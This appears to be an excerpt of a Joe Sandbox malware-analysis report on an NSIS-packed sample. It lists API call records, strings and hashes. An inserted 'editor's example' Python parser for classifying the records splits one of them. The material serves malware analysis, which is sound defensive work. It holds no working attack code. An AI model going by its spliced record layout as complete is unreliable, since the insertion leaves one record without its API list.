                                                                      • Source File: 00000003.00000002.2611652044.0000000036910000.00000040.00000800.00020000.00000000.sdmp, Offset: 36910000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_36910000_yVVZdG2NJX.jbxd
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,000003F9), ref: 00404C93
                                                                      • GetDlgItem.USER32(?,00000408), ref: 00404C9E
                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404CE8
                                                                      • LoadBitmapW.USER32(0000006E), ref: 00404CFB
                                                                      • SetWindowLongW.USER32(?,000000FC,00405273), ref: 00404D14
                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D28
                                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D3A
                                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404D50
                                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D5C
                                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D6E
                                                                      • DeleteObject.GDI32(00000000), ref: 00404D71
                                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D9C
                                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404DA8
                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E3E
                                                                      • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E69
                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E7D
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404EAC
                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EBA
                                                                      • ShowWindow.USER32(?,00000005), ref: 00404ECB
                                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FC8
                                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040502D
                                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405042
                                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405066
                                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405086
                                                                      • ImageList_Destroy.COMCTL32(?), ref: 0040509B
                                                                      • GlobalFree.KERNEL32(?), ref: 004050AB
                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405124
                                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 004051CD
                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051DC
                                                                      • InvalidateRect.USER32(?,00000000,?), ref: 004051FC
                                                                      • ShowWindow.USER32(?,00000000), ref: 0040524A
                                                                      • GetDlgItem.USER32(?,000003FE), ref: 00405255
                                                                      • ShowWindow.USER32(00000000), ref: 0040525C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                      • String ID: $M$N
                                                                      APIs
                                                                      • DeleteFileW.KERNEL32(?,?), ref: 004059D2
                                                                      • lstrcatW.KERNEL32(007A3F28,\*.*,007A3F28,?,?), ref: 00405A1A
                                                                      • lstrcatW.KERNEL32(?,0040A014,?,007A3F28,?,?), ref: 00405A3D
                                                                      • lstrlenW.KERNEL32(?,?,0040A014,?,007A3F28,?,?), ref: 00405A43
                                                                      • FindFirstFileW.KERNEL32(007A3F28,?,?,?,0040A014,?,007A3F28,?,?), ref: 00405A53
                                                                      • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AF3
                                                                      • FindClose.KERNEL32(00000000), ref: 00405B02
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                      • String ID: (?z$.$.$\*.*
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,007A4F70,?,00401676,00000000), ref: 004065E5
                                                                      • FindClose.KERNEL32(00000000,?,00401676,00000000), ref: 004065F1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: Find$CloseFileFirst
                                                                      • String ID: pOz
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,00000403), ref: 0040549C
                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004054AB
                                                                      • GetClientRect.USER32(?,?), ref: 004054E8
                                                                      • GetSystemMetrics.USER32(00000002), ref: 004054EF
                                                                      • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405510
                                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405521
                                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405534
                                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405542
                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405555
                                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405577
                                                                      • ShowWindow.USER32(?,00000008), ref: 0040558B
                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004055AC
                                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055BC
                                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055D5
                                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055E1
• GetDlgItem.USER32(?,000003F8), ref: 004054BA
  • Part of subcall function 00404243: SendMessageW.USER32(00000028,?,?,0040406E), ref: 00404251
• GetDlgItem.USER32(?,000003EC), ref: 004055FE
• CreateThread.KERNEL32(00000000,00000000,Function_000053D2,00000000), ref: 0040560C
• CloseHandle.KERNEL32(00000000), ref: 00405613
• ShowWindow.USER32(00000000), ref: 00405637
• ShowWindow.USER32(?,00000008), ref: 0040563C
• ShowWindow.USER32(00000008), ref: 00405686
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056BA
• CreatePopupMenu.USER32 ref: 004056CB
• AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056DF
• GetWindowRect.USER32(?,?), ref: 004056FF
• TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405718
• SendMessageW.USER32(?,00001073,00000000,?), ref: 00405750
• OpenClipboard.USER32(00000000), ref: 00405760
• EmptyClipboard.USER32 ref: 00405766
• GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405772
• GlobalLock.KERNEL32(00000000), ref: 0040577C
• SendMessageW.USER32(?,00001073,00000000,?), ref: 00405790
• GlobalUnlock.KERNEL32(00000000), ref: 004057B0
• SetClipboardData.USER32(0000000D,00000000), ref: 004057BB
• CloseClipboard.USER32 ref: 004057C1
Memory Dump Source
• Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
Similarity
• API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
• String ID: {
• API String ID: 590372296-366298937
• Opcode ID: 17a21c63557b4cf9ffe78a5fd5086114b1c8428fb936cdfcd18ae7c9549b7d0c
• Instruction ID: e2c232b37aba284685acfefcf9c5e68312cc9a4ea8bcb72f9f75ba3fcde89da4
• Opcode Fuzzy Hash: 17a21c63557b4cf9ffe78a5fd5086114b1c8428fb936cdfcd18ae7c9549b7d0c
• Instruction Fuzzy Hash: 0EB15871900608FFDB119FA0DD89EAE7B79FB48354F00812AFA44BA1A0CB795E51DF58
APIs
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D71
• ShowWindow.USER32(?), ref: 00403D8E
• DestroyWindow.USER32 ref: 00403DA2
• SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DBE
• GetDlgItem.USER32(?,?), ref: 00403DDF
• SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DF3
• IsWindowEnabled.USER32(00000000), ref: 00403DFA
• GetDlgItem.USER32(?,?), ref: 00403EA8
• GetDlgItem.USER32(?,00000002), ref: 00403EB2
• SetClassLongW.USER32(?,000000F2,?), ref: 00403ECC
• SendMessageW.USER32(0000040F,00000000,?), ref: 00403F1D
• GetDlgItem.USER32(?,00000003), ref: 00403FC3
• ShowWindow.USER32(00000000,?), ref: 00403FE4
• EnableWindow.USER32(?,?), ref: 00403FF6
• EnableWindow.USER32(?,?), ref: 00404011
• GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00404027
• EnableMenuItem.USER32(00000000), ref: 0040402E
• SendMessageW.USER32(?,000000F4,00000000,?), ref: 00404046
• SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404059
• lstrlenW.KERNEL32(007A1F20,?,007A1F20,00000000), ref: 00404083
• SetWindowTextW.USER32(?,007A1F20), ref: 00404097
• ShowWindow.USER32(?,0000000A), ref: 004041CB
Memory Dump Source
• Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
Similarity
• API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
• String ID:
• API String ID: 184305955-0
• Opcode ID: ee67474a1a288a69095d81a28a6b41206e342fd1b930cad1f65484e832d6543b
• Instruction ID: db2580999c41c4fe450d1ee4fd1a55221d51bf0aef153e7307bc2b2ec56299a6
• Opcode Fuzzy Hash: ee67474a1a288a69095d81a28a6b41206e342fd1b930cad1f65484e832d6543b
• Instruction Fuzzy Hash: 3FC1DEB2504200AFDB206F61ED48E2B3AA8EB9A745F01453FF651B11F0CB399991DB5E
APIs
  • Part of subcall function 00406671: GetModuleHandleA.KERNEL32(?,00000020,?,004033DE,0000000A), ref: 00406683
  • Part of subcall function 00406671: GetProcAddress.KERNEL32(00000000,?), ref: 0040669E
• lstrcatW.KERNEL32(007B5000,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000,00000002,007B5800,774D3420,007B3000,00000000), ref: 00403A08
• lstrlenW.KERNEL32(007A69C0,007B3800,?,?,007A69C0,00000000,007B3800,007B5000,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000,00000002,007B5800), ref: 00403A88
• lstrcmpiW.KERNEL32(007A69B8,.exe,007A69C0,007B3800,?,?,007A69C0,00000000,007B3800,007B5000,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000), ref: 00403A9B
• GetFileAttributesW.KERNEL32(007A69C0), ref: 00403AA6
• LoadImageW.USER32(00000067,?,00000000,00000000,00008040,007B3800), ref: 00403AEF
  • Part of subcall function 004061DE: wsprintfW.USER32 ref: 004061EB
• RegisterClassW.USER32(007A79C0), ref: 00403B2C
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B44
• CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B79
• ShowWindow.USER32(00000005), ref: 00403BAF
• GetClassInfoW.USER32(00000000,RichEdit20W,007A79C0), ref: 00403BDB
• GetClassInfoW.USER32(00000000,RichEdit,007A79C0), ref: 00403BE8
• RegisterClassW.USER32(007A79C0), ref: 00403BF1
• DialogBoxParamW.USER32(?,00000000,00403D35,00000000), ref: 00403C10
Memory Dump Source
• Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
Similarity
• API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
• String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
• API String ID: 1975747703-1115850852
• Opcode ID: 123c00e8e8eae349a6b6ffc178d207f9f8b23400aead47fb4df4bed5afc77f76
• Instruction ID: fbef4646fbcf09e2f3785bbd11e1a9055ea34cd93d2d0ed92f9d0f486109358d
• Opcode Fuzzy Hash: 123c00e8e8eae349a6b6ffc178d207f9f8b23400aead47fb4df4bed5afc77f76
• Instruction Fuzzy Hash: 4D61B434200700AED320AF669D45F2B3A6CEB86745F40857FF941B51E2DB7D6901CB2D
APIs
• CheckDlgButton.USER32(?,-0000040A,?), ref: 0040446B
• GetDlgItem.USER32(?,000003E8), ref: 0040447F
• SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 0040449C
• GetSysColor.USER32(?), ref: 004044AD
• SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044BB
• SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044C9
• lstrlenW.KERNEL32(?), ref: 004044CE
• SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044DB
• SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044F0
• GetDlgItem.USER32(?,0000040A), ref: 00404549
• SendMessageW.USER32(00000000), ref: 00404550
• GetDlgItem.USER32(?,000003E8), ref: 0040457B
• SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045BE
• LoadCursorW.USER32(00000000,00007F02), ref: 004045CC
• SetCursor.USER32(00000000), ref: 004045CF
• LoadCursorW.USER32(00000000,00007F00), ref: 004045E8
• SetCursor.USER32(00000000), ref: 004045EB
• SendMessageW.USER32(00000111,?,00000000), ref: 0040461A
• SendMessageW.USER32(00000010,00000000,00000000), ref: 0040462C
Memory Dump Source
• Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
Similarity
• API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
• String ID: DC@$N
• API String ID: 3103080414-4075224758
• Opcode ID: 2da216cdb10da56fdc38759a2ba284d26a9c8f7b49192765219d3b76b1da507d
• Instruction ID: 7c305bb631aa8564409a9791ba7e53f932479190766108f73685c8e55a50eb1d
• Opcode Fuzzy Hash: 2da216cdb10da56fdc38759a2ba284d26a9c8f7b49192765219d3b76b1da507d
• Instruction Fuzzy Hash: 3B61A0B1900209BFDF10AF60DD45AAA7B69FB85344F00843AF701B61E0D77DA951CF98
APIs
• DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
• BeginPaint.USER32(?,?), ref: 00401047
• GetClientRect.USER32(?,?), ref: 0040105B
• CreateBrushIndirect.GDI32(00000000), ref: 004010CF
• FillRect.USER32(00000000,?,00000000), ref: 004010E4
• DeleteObject.GDI32(?), ref: 004010ED
• CreateFontIndirectW.GDI32(?), ref: 00401105
• SetBkMode.GDI32(00000000,?), ref: 00401126
• SetTextColor.GDI32(00000000,000000FF), ref: 00401130
• SelectObject.GDI32(00000000,?), ref: 00401140
• DrawTextW.USER32(00000000,007A7A20,000000FF,00000010,00000820), ref: 00401156
• SelectObject.GDI32(00000000,00000000), ref: 00401160
• DeleteObject.GDI32(?), ref: 00401165
• EndPaint.USER32(?,?), ref: 0040116E
Memory Dump Source
• Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
Similarity
• API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
• String ID: F
• API String ID: 941294808-1304234792
• Opcode ID: 218f2c87b148b58c94c6785b51cf5afc075c1faf60bc5df3e6f759b2377d660f
• Instruction ID: 0958fbfe94b1809001ec2c76305b3cf500f7264b01c73c256976ee1787a3906e
• Opcode Fuzzy Hash: 218f2c87b148b58c94c6785b51cf5afc075c1faf60bc5df3e6f759b2377d660f
• Instruction Fuzzy Hash: B1418C71800209AFCF058F95DE459AF7BB9FF45310F00842AF591AA1A0CB38D954DFA4
APIs
• CloseHandle.KERNEL32(00000000,?,00000000,?,00000000,00000000,?,?,0040607E,?,?), ref: 00405F1E
• GetShortPathNameW.KERNEL32(?,007A55C0,00000400), ref: 00405F27
  • Part of subcall function 00405CF2: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000), ref: 00405D02
  • Part of subcall function 00405CF2: lstrlenA.KERNEL32(00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000), ref: 00405D34
• GetShortPathNameW.KERNEL32(?,007A5DC0,00000400), ref: 00405F44
• wsprintfA.USER32 ref: 00405F62
• GetFileSize.KERNEL32(00000000,00000000,007A5DC0,C0000000,00000004,007A5DC0,?), ref: 00405F9D
• GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405FAC
• lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405FE4
• SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,007A51C0,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 0040603A
• GlobalFree.KERNEL32(00000000), ref: 0040604B
• CloseHandle.KERNEL32(00000000), ref: 00406052
  • Part of subcall function 00405D8D: GetFileAttributesW.KERNEL32(007B6800,00402F1D,007B6800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D91
  • Part of subcall function 00405D8D: CreateFileW.KERNEL32(?,?,?,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DB3
Memory Dump Source
• Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
Similarity
• API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
• String ID: %ls=%ls$[Rename]
• API String ID: 2171350718-461813615
• Opcode ID: 8e2ef562050374cbdee482ce01d0fc4b650d83fac470073e0dfd2f2c2df1a008
• Instruction ID: 42876e8bd8e74e9ce15c52ab3024c97c29192655820983ae090f8c600f4dcad6
• Opcode Fuzzy Hash: 8e2ef562050374cbdee482ce01d0fc4b650d83fac470073e0dfd2f2c2df1a008
• Instruction Fuzzy Hash: 25312530240B156BD220BB218D48F6B3A9DEF86744F15003AFA42F62D1EA7DD8148ABD
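The function records in this section all share one layout: an APIs list of `• Api.DLL(args), ref: ADDR` lines (with `Part of subcall function XXXX:` for calls reached through a callee), the memory dump source, and a Similarity block whose `String ID` is a `$`-separated list. Reading them by eye is slow, and most of them here are the stock NSIS installer stub rather than the GuLoader payload. The script below is an added editor's example, not part of the Joe Sandbox report or of Joe Sandbox itself: it parses records in that layout into data, pulls out the inline string arguments, and flags two markers of the NSIS stub. The mapping of the markers to NSIS is the editor's annotation: `NSIS Error` is the stub's startup failure banner, and a `[Rename]` section written with short path names and a `%ls=%ls` line is the NSIS rename-on-reboot helper, which appends to wininit.ini. The excerpt embedded in the script is copied from the `[Rename]` record just above and from the clipboard record earlier in this section; the marker names and the assumption that argument strings contain no commas are the editor's.

```python
"""Parse Joe Sandbox 'IDA Plugin' function records (the '• Api.DLL(args), ref: ADDR'
lists in this report) into structured data and flag stock NSIS stub functions.
Editor's example; not part of the report or of Joe Sandbox."""
import re
from collections import Counter

# Constructed excerpt: lines copied from two of this report's records (the
# '[Rename]' function and the clipboard function). Not the whole report.
REPORT_EXCERPT = """\
APIs
• CloseHandle.KERNEL32(00000000,?,00000000,?,00000000,00000000,?,?,0040607E,?,?), ref: 00405F1E
• GetShortPathNameW.KERNEL32(?,007A55C0,00000400), ref: 00405F27
  • Part of subcall function 00405CF2: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000), ref: 00405D02
• wsprintfA.USER32 ref: 00405F62
• lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405FE4
Similarity
• API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
• String ID: %ls=%ls$[Rename]
• Opcode ID: 8e2ef562050374cbdee482ce01d0fc4b650d83fac470073e0dfd2f2c2df1a008
APIs
• OpenClipboard.USER32(00000000), ref: 00405760
• EmptyClipboard.USER32 ref: 00405766
• SetClipboardData.USER32(0000000D,00000000), ref: 004057BB
• CloseClipboard.USER32 ref: 004057C1
Similarity
• API ID: MessageSend$Window$ItemShow$Clipboard
• String ID: {
• Opcode ID: 17a21c63557b4cf9ffe78a5fd5086114b1c8428fb936cdfcd18ae7c9549b7d0c
"""

# One API call line. 'Part of subcall function XXXX:' marks a call reached through
# a callee; a call with no argument list ('wsprintfA.USER32 ref: ...') has no parens.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<dll>[A-Z0-9]+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
HEX_RE = re.compile(r"^-?[0-9A-F]{8}$")


def parse_records(text):
    """Split the listing into per-function records: calls, string IDs, opcode ID.
    Assumes the report's layout: a record starts at an 'APIs' header, 'String ID'
    entries are '$'-separated, and no argument string contains a comma (assumption,
    true for the lines in this report)."""
    records, cur = [], None
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":
            cur = {"calls": [], "strings": [], "opcode_id": None}
            records.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            args = m["args"].split(",") if m["args"] is not None else []
            cur["calls"].append({"api": m["api"], "dll": m["dll"], "ref": m["ref"],
                                 "args": args, "via_subcall": m["sub"]})
        elif s.startswith("• String ID:"):
            cur["strings"] = [t for t in s.split(":", 1)[1].strip().split("$") if t]
        elif s.startswith("• Opcode ID:"):
            cur["opcode_id"] = s.split(":", 1)[1].strip()
    return records


def literal_args(record):
    """Argument tokens that are neither 8-digit hex nor '?': the inline strings."""
    return {a for c in record["calls"] for a in c["args"]
            if a != "?" and not HEX_RE.match(a)}


# Editor's annotation of the stock NSIS exehead: '[Rename]' written with short path
# names and a '%ls=%ls' line is its rename-on-reboot helper (appends to wininit.ini);
# 'NSIS Error' is its startup failure banner. Marker names are the editor's.
NSIS_MARKERS = {
    "nsis_error_banner": lambda r: "NSIS Error" in r["strings"],
    "rename_on_reboot": lambda r: ("[Rename]" in (set(r["strings"]) | literal_args(r))
                                   and any(c["api"] == "GetShortPathNameW" for c in r["calls"])),
}


def classify(record):
    """Names of the NSIS markers a record matches; an empty list means read it by hand."""
    return sorted(name for name, test in NSIS_MARKERS.items() if test(record))


def call_sites(records, api):
    """Every (ref, dll) at which `api` is called, directly or through a subcall."""
    return sorted((c["ref"], c["dll"]) for r in records for c in r["calls"] if c["api"] == api)


def dll_histogram(records):
    """How many listed calls go to each DLL across all records."""
    return Counter(c["dll"] for r in records for c in r["calls"])


if __name__ == "__main__":
    recs = parse_records(REPORT_EXCERPT)
    for r in recs:
        print(r["opcode_id"][:12], classify(r) or "UNCLASSIFIED", sorted(literal_args(r)))
    print(call_sites(recs, "SetClipboardData"), dict(dll_histogram(recs)))
```

Run it against the full function listing of a report (the same layout is used for every record) and the records that come back unclassified, and whose inline strings are not NSIS's, are the ones to open in the disassembler first.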
Memory Dump Source
• Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
Similarity
• API ID: ErrorModeVersionlstrlen
• String ID: NSIS Error$UXTHEME
• API String ID: 758611499-110662866
• Opcode ID: 216c36faef8c5c050b55b88396924ad1417f673f7408521f9ddb59849cb913ab
• Instruction ID: a84716d26b240927f2f501cde0935ca932456bd970f48cf256b7861c77eac06c
• Opcode Fuzzy Hash: 216c36faef8c5c050b55b88396924ad1417f673f7408521f9ddb59849cb913ab
• Instruction Fuzzy Hash: FF218071500700ABD7207F61AE49B1B3AA8AB81705F01843FF981B62E2DF7D49558B6E
APIs
• GetDlgItem.USER32(?,000003FB), ref: 0040474E
• SetWindowTextW.USER32(00000000,?), ref: 00404778
• SHBrowseForFolderW.SHELL32(?), ref: 00404829
• CoTaskMemFree.OLE32(00000000), ref: 00404834
• lstrcmpiW.KERNEL32(007A69C0,007A1F20,00000000,?,?), ref: 00404866
• lstrcatW.KERNEL32(?,007A69C0), ref: 00404872
• SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404884
  • Part of subcall function 004058E1: GetDlgItemTextW.USER32(?,?,00000400,004048BB), ref: 004058F4
  • Part of subcall function 0040652B: CharNextW.USER32(?,*?|<>/":,00000000,00000000,007B5800,007B5800,007B3000,00403347,007B5800,774D3420,004035B6,?,00000006,00000008,0000000A), ref: 0040658E
